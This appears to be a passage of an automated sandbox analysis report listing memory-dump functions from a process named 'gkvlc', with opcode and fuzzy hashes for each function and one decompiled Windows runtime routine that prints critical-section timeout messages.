                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0e8211b21727fe2ba57bb0df9a985a85827ea0563b8c026428fddb45f9511873
                                                                                            • Instruction ID: 3d5af1a720ec26eb11f3ece172e70270e194f940f542ea6ebd1e22bb9b08fef6
                                                                                            • Opcode Fuzzy Hash: 0e8211b21727fe2ba57bb0df9a985a85827ea0563b8c026428fddb45f9511873
                                                                                            • Instruction Fuzzy Hash: 4890026130500402D30261694414B060009D7D1385F92C036E1514595D86658953F172
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9820 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: df804f6c69e7b9c6379c798f03399d7e28abe75afd5ebfb7aa6381a0bd583336
                                                                                            • Instruction ID: 6c53177ca3f6b5fae878caef4134b5b9331b09dcc816946c058a6313d29f18d7
                                                                                            • Opcode Fuzzy Hash: df804f6c69e7b9c6379c798f03399d7e28abe75afd5ebfb7aa6381a0bd583336
                                                                                            • Instruction Fuzzy Hash: A290027124500402D34171694404B060009A7D0381F92C036A0514594E86958A56FAA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00ABB040 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3304b1fc7c6080feefccfad05be655d3238f6e5224e06cd2d2b4aa93dd240871
                                                                                            • Instruction ID: f75ae7e81ae6304e22298c47aa7224f5cf6bbeb007eda64a760a0272a49d338e
                                                                                            • Opcode Fuzzy Hash: 3304b1fc7c6080feefccfad05be655d3238f6e5224e06cd2d2b4aa93dd240871
                                                                                            • Instruction Fuzzy Hash: 7E9002A1605140434740B16948049065015A7E1341392C135A05445A0C86A88855E2A5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB95F0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0e2113b14bc484459fbb86e61123a8f83ab9b5a9b2dad41bad9042a47b9cb06c
                                                                                            • Instruction ID: ed6be8a705f1f99ec2925b122e226e47ca715ea7f66ea622bddd2c9e1b2107ba
                                                                                            • Opcode Fuzzy Hash: 0e2113b14bc484459fbb86e61123a8f83ab9b5a9b2dad41bad9042a47b9cb06c
                                                                                            • Instruction Fuzzy Hash: BD90027120500802D30461694804B86000597D0341F52C035A6114695E96A58891B171
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB99D0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 47f9a9a2c6899d86784f38a22dbe98b11c2bb291b440ea22422170e0c23633dd
                                                                                            • Instruction ID: 3eb2ec0cdb3d3ec0676796c684d826ff344240f7868fec35be3edd68acdfbfe3
                                                                                            • Opcode Fuzzy Hash: 47f9a9a2c6899d86784f38a22dbe98b11c2bb291b440ea22422170e0c23633dd
                                                                                            • Instruction Fuzzy Hash: 1F9002A121500042D30461694404B06004597E1341F52C036A2244594CC5698C61A165
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: add9bab60737f7f7ba5a81373750a82865a8c2ff13d4dbfab44601ab0723e2f1
                                                                                            • Instruction ID: a40986a61de035ca1deb007017e058ca5b8c1f0627919953ee223e5ded9b15a5
                                                                                            • Opcode Fuzzy Hash: add9bab60737f7f7ba5a81373750a82865a8c2ff13d4dbfab44601ab0723e2f1
                                                                                            • Instruction Fuzzy Hash: 239002E1205140924700A2698404F0A450597E0341B52C03AE11445A0CC5658851E175
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00ABAD30 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 95fd52f1bce1ecd8d071973ab841f865fd9f0ff9f722ecf0c37a3f197796d31f
                                                                                            • Instruction ID: 5b81e486b5d4539877e3a6433a19d3b6de9dc8f3256072923b218d431a09c67b
                                                                                            • Opcode Fuzzy Hash: 95fd52f1bce1ecd8d071973ab841f865fd9f0ff9f722ecf0c37a3f197796d31f
                                                                                            • Instruction Fuzzy Hash: 6C900271A0900012934071694814B464006A7E0781B56C035A0604594C89948A55A3E1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9560 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 73f4bf5880e6f94489d74f0b234c55ea0141302af988571524e8edcd4c7c3316
                                                                                            • Instruction ID: 6c2f8a19244e812241081d30dcb70f43dcdff8f02f24bb6a79f8744fdf53db68
                                                                                            • Opcode Fuzzy Hash: 73f4bf5880e6f94489d74f0b234c55ea0141302af988571524e8edcd4c7c3316
                                                                                            • Instruction Fuzzy Hash: 3F900265225000020345A5690604A0B0445A7D6391392C039F15065D0CC6618865A361
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9950 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6ca344f6059146b47eb8b24c8fe54dc59e2eab76669155b78ca4a2e6a5d9e42e
                                                                                            • Instruction ID: 35f0725ba9862cabd772c52fcb1dbbb05b1879467df495e1ff68a05124c4ab35
                                                                                            • Opcode Fuzzy Hash: 6ca344f6059146b47eb8b24c8fe54dc59e2eab76669155b78ca4a2e6a5d9e42e
                                                                                            • Instruction Fuzzy Hash: 319002A120540403D34065694804B07000597D0342F52C035A2154595E8A698C51B175
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9A80 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b20bf7e1c48501ea1a25d39765dfb26d0dafa2e0a84d9b94f2d7fba16005a2de
                                                                                            • Instruction ID: 7029dda305442e1b1190bc795444c3c4ee646d59978d335548847ba5849de1c5
                                                                                            • Opcode Fuzzy Hash: b20bf7e1c48501ea1a25d39765dfb26d0dafa2e0a84d9b94f2d7fba16005a2de
                                                                                            • Instruction Fuzzy Hash: D990026120544442D34062694804F0F410597E1342F92C03DA4246594CC9558855A761
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB96D0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 67600f62cd35d224edd333db3325c75a2f9469fa40de186bebd4ba0ce09cca48
                                                                                            • Instruction ID: fb575ff8cfa5ee648c23addf5987a082e8a26b5af66340ad18b81a3f79ad7e67
                                                                                            • Opcode Fuzzy Hash: 67600f62cd35d224edd333db3325c75a2f9469fa40de186bebd4ba0ce09cca48
                                                                                            • Instruction Fuzzy Hash: 5490027120500842D30061694404F46000597E0341F52C03AA0214694D8655C851B561
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9A10 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 12893d1f66c4ada2664070d9afac2df0daae0f4d326820bce6525651a146a9b9
                                                                                            • Instruction ID: 5138a3ffa0ff4b38a94ddc0af292694174841e4730c3d11c0ebdd8b2c77e2124
                                                                                            • Opcode Fuzzy Hash: 12893d1f66c4ada2664070d9afac2df0daae0f4d326820bce6525651a146a9b9
                                                                                            • Instruction Fuzzy Hash: C190027120540402D30061694808B47000597D0342F52C035A5254595E86A5C891B571
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9610 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4713a286106670c80f211357841a4488566ab18476fb25ccb6ab9fb6a892d485
                                                                                            • Instruction ID: 89d22fcf2b6f08c97e692b5398c26ac0dee9abfa238ef4b11e3b99c0f9003f80
                                                                                            • Opcode Fuzzy Hash: 4713a286106670c80f211357841a4488566ab18476fb25ccb6ab9fb6a892d485
                                                                                            • Instruction Fuzzy Hash: 2F90027160900802D35071694414B46000597D0341F52C035A0114694D87958A55B6E1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9650 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b6ea5b3d13714d781358bf8a5f3c7c785572597c955bf31040a6b18f35d3521c
                                                                                            • Instruction ID: 48db54c47d282b32d5aa0cc7158c4e10406cd6b064d8023c1ad0eddd854dcc2a
                                                                                            • Opcode Fuzzy Hash: b6ea5b3d13714d781358bf8a5f3c7c785572597c955bf31040a6b18f35d3521c
                                                                                            • Instruction Fuzzy Hash: 6790027120904842D34071694404F46001597D0345F52C035A01546D4D96658D55F6A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00ABA3B0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0c26952f97a65e1633246dba56137aa9ba2b5139873da8ea887393781c2cdc93
                                                                                            • Instruction ID: 062e2342a8216098ddeeb0e5edddf36eabd6e7aafbff9f98a6e913044de104b5
                                                                                            • Opcode Fuzzy Hash: 0c26952f97a65e1633246dba56137aa9ba2b5139873da8ea887393781c2cdc93
                                                                                            • Instruction Fuzzy Hash: F490027120544002D34071698444B0B5005A7E0341F52C435E0515594C86558856E261
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9730 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c0b4f155f5301873da2c0df0726af076bc39bf9367bef183bde372dffa977678
                                                                                            • Instruction ID: 133f25e20edba5eec6c66537ff6acf3799fd51e7aafa144d3ac0cf8f79806eb1
                                                                                            • Opcode Fuzzy Hash: c0b4f155f5301873da2c0df0726af076bc39bf9367bef183bde372dffa977678
                                                                                            • Instruction Fuzzy Hash: F790026160900402D34071695418B06001597D0341F52D035A0114594DC6998A55B6E1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9B00 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c0dcadaa1b63827bb3627ac7d6985336357b0e25e0e1d07cc0a850649b072018
                                                                                            • Instruction ID: 35fa8ce29d23dc4a31ce47c37f4a28a7283f933d93ffa76d82c218abe2352bf5
                                                                                            • Opcode Fuzzy Hash: c0dcadaa1b63827bb3627ac7d6985336357b0e25e0e1d07cc0a850649b072018
                                                                                            • Instruction Fuzzy Hash: 2590026124500802D34071698414B070006D7D0741F52C035A0114594D86568965B6F1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00ABA710 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1a50cf37d77eed41a34a5212c7595780acb6d614a625c751e187858ab294472d
                                                                                            • Instruction ID: ad979abee1b31fb37d86e7209d2f09f58b23bb9b8142aaba8bc4d94e1f0f0964
                                                                                            • Opcode Fuzzy Hash: 1a50cf37d77eed41a34a5212c7595780acb6d614a625c751e187858ab294472d
                                                                                            • Instruction Fuzzy Hash: DE900271305000529700A6A95804F4A410597F0341B52D039A4104594C85948861A161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9760 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 70be82affbdc52f07e042d7c88c0ca3fe991817a71b42a08d6f420f0fd18ba17
                                                                                            • Instruction ID: b5fedd925999d55cdd36c154a349704c6730e4f8af98a0ff374cffabcdc2c0b5
                                                                                            • Opcode Fuzzy Hash: 70be82affbdc52f07e042d7c88c0ca3fe991817a71b42a08d6f420f0fd18ba17
                                                                                            • Instruction Fuzzy Hash: B490027120500403D30061695508B07000597D0341F52D435A0514598DD6968851B161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9770 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aaf655df608b544bb2c7b9214b8c06628a891535faf152b8dc9ade33c54ba4e0
                                                                                            • Instruction ID: 2820e33edad96c8073d441cf8b467349140a2c2c5665985fd971a08317af0b9f
                                                                                            • Opcode Fuzzy Hash: aaf655df608b544bb2c7b9214b8c06628a891535faf152b8dc9ade33c54ba4e0
                                                                                            • Instruction Fuzzy Hash: 0990026120904442D30065695408F06000597D0345F52D035A11545D5DC6758851F171
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00ABA770 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9aad387282feb1bddab33835f501451b8892d5c6b939f512ccccbe4dc968978b
                                                                                            • Instruction ID: 839f87062b0c8f29c0d1ed1583676903a87c8895062ab4ada9e5a5374e6dafb7
                                                                                            • Opcode Fuzzy Hash: 9aad387282feb1bddab33835f501451b8892d5c6b939f512ccccbe4dc968978b
                                                                                            • Instruction Fuzzy Hash: C790027520904442D70065695804F87000597D0345F52D435A05145DCD86948861F161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AB9670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                            • Instruction ID: fffe924e3715e38202a0e3d92c7aa9f816dad169290f16defe818bb41ed2bb3a
                                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                            • Instruction Fuzzy Hash:
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00B0FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 53%
                                                                                            			E00B0FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00ABCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00B05720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00B05720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                            0x00b0fdda
                                                                                            0x00b0fde2
                                                                                            0x00b0fde5
                                                                                            0x00b0fdec
                                                                                            0x00b0fdfa
                                                                                            0x00b0fdff
                                                                                            0x00b0fe0a
                                                                                            0x00b0fe0f
                                                                                            0x00b0fe17
                                                                                            0x00b0fe1e
                                                                                            0x00b0fe19
                                                                                            0x00b0fe19
                                                                                            0x00b0fe19
                                                                                            0x00b0fe20
                                                                                            0x00b0fe21
                                                                                            0x00b0fe22
                                                                                            0x00b0fe25
                                                                                            0x00b0fe40

                                                                                            APIs
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B0FDFA
                                                                                            Strings
                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B0FE01
                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B0FE2B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.307286924.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_a50000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                            • API String ID: 885266447-3903918235
                                                                                            • Opcode ID: c695ffa3c0483e8cbd58a0e67f530350a040c27bc758f290da3912682dcdbe8a
                                                                                            • Instruction ID: acea7fd983f31da6c1ca6c994c62319758937d631e160ad9cbbf45cef84d7896
                                                                                            • Opcode Fuzzy Hash: c695ffa3c0483e8cbd58a0e67f530350a040c27bc758f290da3912682dcdbe8a
                                                                                            • Instruction Fuzzy Hash: 6EF0F632200601BFD6301A45DC06F73BFAAEB44730F240354F628565E2DA62FC2097F0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%